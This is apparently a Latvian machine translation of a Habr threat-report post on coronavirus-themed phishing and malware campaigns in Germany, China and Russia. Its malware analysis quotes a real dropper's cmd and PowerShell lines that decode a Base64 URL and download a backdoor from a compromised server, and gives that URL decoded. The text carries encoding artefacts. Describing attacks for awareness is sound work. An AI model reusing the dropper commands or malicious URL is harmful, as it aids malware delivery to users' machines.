Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Uzbrucēji turpina izmantot COVID-19 tēmu, radot arvien vairāk apdraudējumu lietotājiem, kurus ļoti interesē viss, kas saistÄ«ts ar epidēmiju. IN pēdējais ieraksts Mēs jau runājām par to, kāda veida ļaunprogrammatÅ«ra parādÄ«jās pēc koronavÄ«rusa, un Å”odien mēs runāsim par sociālās inženierijas paņēmieniem, ar kuriem lietotāji dažādās valstÄ«s, tostarp Krievijā, jau ir saskāruÅ”ies. VispārÄ«gās tendences un piemēri ir zem griezuma.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Atceries iekŔā pēdējo reizi Runājām par to, ka cilvēki ir gatavi lasÄ«t ne tikai par koronavÄ«rusu un epidēmijas gaitu, bet arÄ« par finansiālā atbalsta pasākumiem? Å eit ir labs piemērs. Interesants pikŔķerÄ“Å”anas uzbrukums tika atklāts Vācijas Ziemeļreinas-Vestfālenes Å”tatā jeb NRW. Uzbrucēji izveidoja Ekonomikas ministrijas vietnes (NRW Ekonomikas ministrija), kur ikviens var pieteikties finansiālai palÄ«dzÄ«bai. Šāda programma patieŔām pastāv, un tā izrādÄ«jās izdevÄ«ga krāpniekiem. SaņēmuÅ”i savu upuru personas datus, viņi reālajā ministrijas mājaslapā vērsās pie iesnieguma, bet norādÄ«ja citus bankas rekvizÄ«tus. Pēc oficiālajiem datiem, lÄ«dz shēmas atklāŔanai tika veikti 4 tÅ«kstoÅ”i Ŕādu viltus pieprasÄ«jumu. Rezultātā krāpnieku rokās nonāca 109 miljoni dolāru, kas bija paredzēti cietuÅ”ajiem pilsoņiem.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Vai vēlaties veikt bezmaksas COVID-19 testu?

Vēl viens nozÄ«mÄ«gs ar koronavÄ«rusu saistÄ«ts pikŔķerÄ“Å”anas piemērs bija atklāts e-pastos. Ziņojumi piesaistÄ«ja lietotāju uzmanÄ«bu ar piedāvājumu veikt bezmaksas koronavÄ«rusa infekcijas pārbaudi. Å o pielikumā vēstules bija Trickbot/Qakbot/Qbot gadÄ«jumi. Un, kad tie, kas vēlējās pārbaudÄ«t savu veselÄ«bu, sāka ā€œaizpildÄ«t pievienoto veidlapuā€, datorā tika lejupielādēts ļaunprātÄ«gs skripts. Un, lai izvairÄ«tos no smilÅ”kastes testÄ“Å”anas, skripts galveno vÄ«rusu sāka lejupielādēt tikai pēc kāda laika, kad aizsardzÄ«bas sistēmas bija pārliecinātas, ka nekādas ļaunprātÄ«gas darbÄ«bas nenotiks.

Arī lielāko daļu lietotāju bija viegli pārliecināt iespējot makro. Lai to izdarītu, tika izmantots standarta triks: lai aizpildītu anketu, vispirms ir jāiespējo makro, kas nozīmē, ka jums ir jāpalaiž VBA skripts.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Kā redzat, VBA skripts ir Ä«paÅ”i maskēts no antivÄ«rusiem.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Sistēmā Windows ir gaidÄ«Å”anas funkcija, kurā lietojumprogramma gaida /T <sekundes>, pirms pieņem noklusējuma atbildi ā€œJāā€. MÅ«su gadÄ«jumā skripts gaidÄ«ja 65 sekundes pirms pagaidu failu dzÄ“Å”anas:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

Un, gaidot, tika lejupielādēta ļaunprātÄ«ga programmatÅ«ra. Å im nolÅ«kam tika palaists Ä«paÅ”s PowerShell skripts:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Pēc Base64 vērtÄ«bas atkodÄ“Å”anas PowerShell skripts no Vācijas lejupielādē aizmugures durvis, kas atrodas iepriekÅ” uzlauztajā tÄ«mekļa serverÄ«:

http://automatischer-staubsauger.com/feature/777777.png

un saglabā to ar nosaukumu:

C:UsersPublictmpdirfile1.exe

Mape ā€˜C:UsersPublictmpdirā€™ tiek dzēsts, palaižot failu 'tmps1.bat', kas satur komandu cmd /c mkdir ""C:UsersPublictmpdir"".

Mērķtiecīgs uzbrukums valsts aģentūrām

Turklāt FireEye analÄ«tiÄ·i nesen ziņoja par mērÄ·tiecÄ«gu APT32 uzbrukumu, kas bija vērsts pret valdÄ«bas struktÅ«rām Uhaņā, kā arÄ« Ķīnas Ārkārtas situāciju pārvaldÄ«bas ministriju. Vienā no izplatÄ«tajiem RTF bija saite uz New York Times rakstu ar nosaukumu KoronavÄ«rusa tieÅ”raides atjauninājumi: Ķīna izseko ceļotājus no Hubei. Tomēr, to izlasot, tika lejupielādēta ļaunprātÄ«ga programmatÅ«ra (FireEye analÄ«tiÄ·i identificēja gadÄ«jumu kā METALJACK).

Interesanti, ka atklāŔanas brīdī neviens no antivīrusiem Ŕo gadījumu neatklāja, norāda Virustotal.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Kad oficiālās vietnes nedarbojas

Visspilgtākais pikŔķerÄ“Å”anas uzbrukuma piemērs notika Krievijā tikai otro dienu. Iemesls tam bija ilgi gaidÄ«tā pabalsta noteikÅ”ana bērniem vecumā no 3 lÄ«dz 16 gadiem. Kad 12. gada 2020. maijā tika paziņots par pieteikumu pieņemÅ”anas sākumu, miljoni steidzās uz Valsts dienesta vietni pēc ilgi gaidÄ«tās palÄ«dzÄ«bas un nogāza portālu ne sliktāk kā profesionāls DDoS uzbrukums. Kad prezidents teica, ka ā€œValsts dienesti nevar tikt galā ar pieteikumu plÅ«smuā€, cilvēki tieÅ”saistē sāka runāt par alternatÄ«vas pieteikumu pieņemÅ”anas vietnes izveidi.

Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Problēma ir tā, ka vairākas vietnes sāka darboties vienlaikus, un viena, īstā vietnē posobie16.gosuslugi.ru, faktiski pieņem pieteikumus, desmitiem vāc lētticīgu lietotāju personas datus.

Kolēģi no SearchInform atrada aptuveni 30 jaunus krāpnieciskus domēnus .ru zonā. Infosecurity un Softline Company kopÅ” aprīļa sākuma ir izsekojuÅ”i vairāk nekā 70 lÄ«dzÄ«gu viltotu valdÄ«bas dienestu vietņu. To veidotāji manipulē ar pazÄ«stamiem simboliem un izmanto arÄ« vārdu gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie un tā tālāk kombinācijas.

Hype un sociālā inženierija

Visi Å”ie piemēri tikai apstiprina, ka uzbrucēji veiksmÄ«gi gÅ«st peļņu no koronavÄ«rusa tēmas. Un jo lielāka ir sociālā spriedze un neskaidrāku jautājumu, jo lielāka iespēja krāpniekiem nozagt svarÄ«gus datus, piespiest cilvēkus paÅ”iem atteikties no savas naudas vai vienkārÅ”i uzlauzt vairāk datoru.

Un, ņemot vērā to, ka pandēmija ir piespiedusi potenciāli nesagatavotus cilvēkus masveidā strādāt no mājām, apdraudēti ir ne tikai personiskie, bet arÄ« korporatÄ«vie dati. Piemēram, nesen pikŔķerÄ“Å”anas uzbrukumam tika pakļauti arÄ« Microsoft 365 (agrāk Office 365) lietotāji. Cilvēki saņēma milzÄ«gus ā€œneatbildētosā€ balss ziņojumus kā vēstuļu pielikumus. Tomēr faili patiesÄ«bā bija HTML lapa, uz kuru tika nosÅ«tÄ«ti uzbrukuma upuri viltota Microsoft 365 pierakstÄ«Å”anās lapa. Tā rezultātā tiek zaudēta piekļuve un visi konta dati tiek apdraudēti.

Avots: www.habr.com

Pievieno komentāru